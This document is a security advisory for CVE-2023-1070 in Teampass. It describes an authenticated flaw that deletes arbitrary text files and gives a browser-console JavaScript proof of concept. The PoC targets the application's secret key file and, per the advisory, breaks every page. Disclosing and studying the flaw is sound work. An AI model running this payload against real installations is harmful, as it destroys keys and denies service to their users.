CVE-2023-1070: Arbitrary txt files deletion (authenticated) in teampass

Description

The file sources/export.queries.php can be exploited by any authenticated user to remove arbitrary txt files. If the system administrator configured the base path for the teampass-seckey.txt to be /var/teampass, as shown in the official example, it is possible to remove it causing a total disruption of the application (all the pages will return 500 Internal Server Error).

When the attack is executed the original .txt file is deleted and a new file named as the deleted one but without the extension is created. The new file will contain some HTML and the content of the original file encrypted by a password chosen by the attacker, making the recovering of the original file impossible.

Proof of Concept

The following PoC assumes that the Teampass SaltKey is stored to /var/teampass/teampass-seckey.txt.

Login with any user (no special permission is required), open a browser console and execute the following JavaScript:

fetch('http://localhost/teampass/sources/export.queries.php', {
    method: 'POST',
    credentials: 'include',
    body: new URLSearchParams({
        type: 'export_to_html_format_finalize',
        file: '/var/teampass/teampass-seckey',
        pdf_password: 'GoodbyeSecretKey'
    }),
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
})

Impact

This vulnerability can be used by an attacker with low privileges to remove arbitrary txt files. It can lead to a total loss of availability if the path of the teampass-seckey.txt is known.